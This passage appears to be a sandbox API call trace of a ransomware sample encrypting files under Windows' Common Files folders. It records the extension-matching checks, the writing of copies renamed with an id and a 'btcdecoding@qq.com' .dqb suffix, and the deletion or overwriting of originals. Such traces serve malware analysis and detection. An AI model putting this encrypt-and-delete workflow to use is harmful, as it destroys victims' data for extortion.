-1 [0052.780] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0052.780] lstrlenW (lpString=".1cd") returned 4 [0052.780] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0052.780] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0052.780] lstrlenW (lpString=".jpg") returned 4 [0052.780] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0052.780] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0052.780] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0052.780] lstrlenW (lpString=".doc") returned 4 [0052.780] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0052.780] lstrlenW (lpString=".docx") returned 5 [0052.780] lstrcmpiW (lpString1=".docx", lpString2="x.dll") returned -1 [0052.780] lstrlenW (lpString=".pdf") returned 4 [0052.780] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0052.780] lstrlenW (lpString=".xls") returned 4 [0052.780] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0052.780] lstrlenW (lpString=".xlsx") returned 5 [0052.780] lstrcmpiW (lpString1=".xlsx", lpString2="x.dll") returned -1 [0052.780] lstrlenW (lpString=".ppt") returned 4 [0052.780] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0052.780] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0052.781] lstrlenW (lpString=".zip") returned 4 [0052.781] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0052.781] lstrlenW (lpString=".rar") returned 4 [0052.781] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0052.781] lstrlenW (lpString=".bz2") returned 4 [0052.781] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0052.781] lstrlenW (lpString=".7z") returned 3 [0052.781] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0052.781] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0052.781] lstrlenW (lpString=".dbf") returned 4 [0052.781] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0052.781] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0052.781] lstrlenW (lpString=".1cd") returned 4 [0052.781] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0052.781] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0052.781] lstrlenW (lpString=".jpg") returned 4 [0052.781] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0052.781] lstrcmpiW (lpString1=".FLT", lpString2=".dqb") returned 1 [0052.781] lstrlenW (lpString="GIFIMP32.FLT") returned 12 [0052.781] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0053.225] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=320384) returned 1 [0053.225] CloseHandle (hObject=0x208) returned 1 [0053.225] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt")) returned 0x20 [0053.226] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.226] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0053.226] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.226] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.226] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0053.230] GetLastError () returned 0x0 [0053.230] ReadFile (in: hFile=0x208, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x4e380, lpOverlapped=0x0) returned 1 [0053.237] WriteFile (in: hFile=0x178, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0x4e390, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0x4e390, lpOverlapped=0x0) returned 1 [0053.242] ReadFile (in: hFile=0x208, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x0, lpOverlapped=0x0) returned 1 [0053.242] WriteFile (in: hFile=0x178, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.242] SetEndOfFile (hFile=0x178) returned 1 [0053.243] CloseHandle (hObject=0x178) returned 1 [0053.243] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.243] SetEndOfFile (hFile=0x208) returned 1 [0053.246] CloseHandle (hObject=0x208) returned 1 [0053.246] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.246] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt")) returned 1 [0053.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0053.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0053.246] lstrlenW (lpString=".doc") returned 4 [0053.246] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0053.246] lstrlenW (lpString=".docx") returned 5 [0053.246] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0053.246] lstrlenW (lpString=".pdf") returned 4 [0053.246] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0053.246] lstrlenW (lpString=".xls") returned 4 [0053.246] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0053.246] lstrlenW (lpString=".xlsx") returned 5 [0053.246] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0053.246] lstrlenW (lpString=".ppt") returned 4 [0053.246] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0053.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0053.246] lstrlenW (lpString=".zip") returned 4 [0053.246] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0053.246] lstrlenW (lpString=".rar") returned 4 [0053.247] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0053.247] lstrlenW (lpString=".bz2") returned 4 [0053.247] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0053.247] lstrlenW (lpString=".7z") returned 3 [0053.247] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0053.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0053.247] lstrlenW (lpString=".dbf") returned 4 [0053.247] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0053.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0053.247] lstrlenW (lpString=".1cd") returned 4 [0053.247] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0053.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0053.247] lstrlenW (lpString=".jpg") returned 4 [0053.247] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0053.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0053.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0053.247] lstrlenW (lpString=".doc") returned 4 [0053.247] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0053.247] lstrlenW (lpString=".docx") returned 5 [0053.247] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0053.247] lstrlenW (lpString=".pdf") returned 4 [0053.247] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0053.247] lstrlenW (lpString=".xls") returned 4 [0053.247] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0053.247] lstrlenW (lpString=".xlsx") returned 5 [0053.247] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0053.247] lstrlenW (lpString=".ppt") returned 4 [0053.247] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0053.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0053.247] lstrlenW (lpString=".zip") returned 4 [0053.247] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0053.247] lstrlenW (lpString=".rar") returned 4 [0053.247] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0053.247] lstrlenW (lpString=".bz2") returned 4 [0053.247] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0053.247] lstrlenW (lpString=".7z") returned 3 [0053.248] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0053.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0053.248] lstrlenW (lpString=".dbf") returned 4 [0053.248] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0053.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0053.248] lstrlenW (lpString=".1cd") returned 4 [0053.248] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0053.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0053.248] lstrlenW (lpString=".jpg") returned 4 [0053.248] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0053.248] lstrcmpiW (lpString1=".FLT", lpString2=".dqb") returned 1 [0053.248] lstrlenW (lpString="PICTIM32.FLT") returned 12 [0053.248] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0053.248] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=73080) returned 1 [0053.248] CloseHandle (hObject=0x208) returned 1 [0053.248] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt")) returned 0x20 [0053.249] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.249] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0053.249] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.249] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.249] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0053.306] GetLastError () returned 0x0 [0053.306] ReadFile (in: hFile=0x208, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x11d78, lpOverlapped=0x0) returned 1 [0053.310] WriteFile (in: hFile=0x230, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0x11d80, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0x11d80, lpOverlapped=0x0) returned 1 [0053.311] ReadFile (in: hFile=0x208, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x0, lpOverlapped=0x0) returned 1 [0053.311] WriteFile (in: hFile=0x230, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.312] SetEndOfFile (hFile=0x230) returned 1 [0053.312] CloseHandle (hObject=0x230) returned 1 [0053.312] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.312] SetEndOfFile (hFile=0x208) returned 1 [0053.313] CloseHandle (hObject=0x208) returned 1 [0053.313] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.313] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt")) returned 1 [0053.314] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0053.314] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0053.314] lstrlenW (lpString=".doc") returned 4 [0053.314] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0053.314] lstrlenW (lpString=".docx") returned 5 [0053.314] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0053.314] lstrlenW (lpString=".pdf") returned 4 [0053.314] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0053.314] lstrlenW (lpString=".xls") returned 4 [0053.314] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0053.314] lstrlenW (lpString=".xlsx") returned 5 [0053.314] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0053.314] lstrlenW (lpString=".ppt") returned 4 [0053.314] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0053.314] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0053.314] lstrlenW (lpString=".zip") returned 4 [0053.314] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0053.314] lstrlenW (lpString=".rar") returned 4 [0053.314] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0053.314] lstrlenW (lpString=".bz2") returned 4 [0053.314] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0053.314] lstrlenW (lpString=".7z") returned 3 [0053.314] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0053.314] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0053.314] lstrlenW (lpString=".dbf") returned 4 [0053.314] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0053.314] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0053.314] lstrlenW (lpString=".1cd") returned 4 [0053.314] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0053.314] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0053.314] lstrlenW (lpString=".jpg") returned 4 [0053.315] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0053.315] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0053.315] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0053.315] lstrlenW (lpString=".doc") returned 4 [0053.315] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0053.315] lstrlenW (lpString=".docx") returned 5 [0053.315] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0053.315] lstrlenW (lpString=".pdf") returned 4 [0053.315] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0053.315] lstrlenW (lpString=".xls") returned 4 [0053.315] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0053.315] lstrlenW (lpString=".xlsx") returned 5 [0053.315] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0053.315] lstrlenW (lpString=".ppt") returned 4 [0053.315] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0053.315] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0053.315] lstrlenW (lpString=".zip") returned 4 [0053.315] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0053.315] lstrlenW (lpString=".rar") returned 4 [0053.315] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0053.315] lstrlenW (lpString=".bz2") returned 4 [0053.315] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0053.315] lstrlenW (lpString=".7z") returned 3 [0053.315] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0053.315] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0053.315] lstrlenW (lpString=".dbf") returned 4 [0053.315] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0053.315] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0053.315] lstrlenW (lpString=".1cd") returned 4 [0053.315] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0053.315] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0053.315] lstrlenW (lpString=".jpg") returned 4 [0053.315] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0053.316] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0053.316] lstrlenW (lpString="ITIRCL55.DLL") returned 12 [0053.316] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0053.766] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=1831424) returned 1 [0053.766] CloseHandle (hObject=0x200) returned 1 [0053.766] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll")) returned 0x20 [0053.766] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.766] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0053.766] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0053.767] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0x0) returned 1 [0053.767] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0053.767] ReadFile (in: hFile=0x200, lpBuffer=0x3970058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x3970058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0053.770] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x950aa, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0053.771] ReadFile (in: hFile=0x200, lpBuffer=0x39b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39b0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0053.774] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0053.774] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x17f200, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0053.774] ReadFile (in: hFile=0x200, lpBuffer=0x39f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39f0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0053.788] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.788] WriteFile (in: hFile=0x200, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x2dbfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0053.809] SetEndOfFile (hFile=0x200) returned 1 [0053.809] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3fa24d0 [0054.067] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0054.070] WriteFile (in: hFile=0x200, lpBuffer=0x3fa24d0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa24d0*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0054.130] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x950aa, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0054.133] WriteFile (in: hFile=0x200, lpBuffer=0x3fa24d0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa24d0*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0054.210] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x17f200, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0054.212] WriteFile (in: hFile=0x200, lpBuffer=0x3fa24d0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa24d0*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0054.379] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fa24d0 | out: hHeap=0x570000) returned 1 [0054.396] CloseHandle (hObject=0x200) returned 1 [0054.396] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0054.396] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0054.396] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0054.396] lstrlenW (lpString=".doc") returned 4 [0054.396] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.396] lstrlenW (lpString=".docx") returned 5 [0054.396] lstrcmpiW (lpString1=".docx", lpString2="5.DLL") returned -1 [0054.396] lstrlenW (lpString=".pdf") returned 4 [0054.396] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.396] lstrlenW (lpString=".xls") returned 4 [0054.397] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.397] 